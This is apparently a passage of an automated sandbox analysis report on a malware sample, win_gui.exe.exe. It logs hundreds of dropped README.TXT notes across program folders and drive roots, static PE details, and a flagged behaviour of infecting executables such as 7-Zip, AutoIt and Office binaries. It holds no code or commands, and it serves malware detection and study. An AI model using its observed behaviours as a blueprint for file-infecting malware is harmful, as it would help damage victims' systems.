Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ar-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\he-il\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ko-kr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nb-no\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nl-nl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pl-pl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pt-br\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ro-ro\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\root\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ru-ru\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sk-sk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-si\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-sl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sv-se\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\tr-tr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\uk-ua\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-cn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-tw\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ar-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fi-fi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-fr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-ma\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\he-il\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hr-hr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hu-hu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\it-it\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ja-jp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ko-kr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nl-nl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ro-ro\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\root\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ru-ru\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sk-sk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-si\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-sl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\tr-tr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ar-ae\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ca-es\README.TXTJump to behavior
Source: win_gui.exe.exeStatic file information: File size 1753088 > 1048576
Source: win_gui.exe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: win_gui.exe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CA0B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcessId,GetEnvironmentVariableW,FreeLibrary,0_2_005CA0B9
Source: win_gui.exe.exeStatic PE information: real checksum: 0x1223c5 should be: 0x1ae5b6
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005D27D0 push ecx; ret 0_2_005D27E3

Persistence and Installation Behavior

barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7-zip.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7z.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7-zip32.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTMJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\Welcome.htmlJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Y:\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\$WinREAgent\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Recovery\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\Recovery\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\$WinREAgent\Scratch\README.TXTJump to behavior
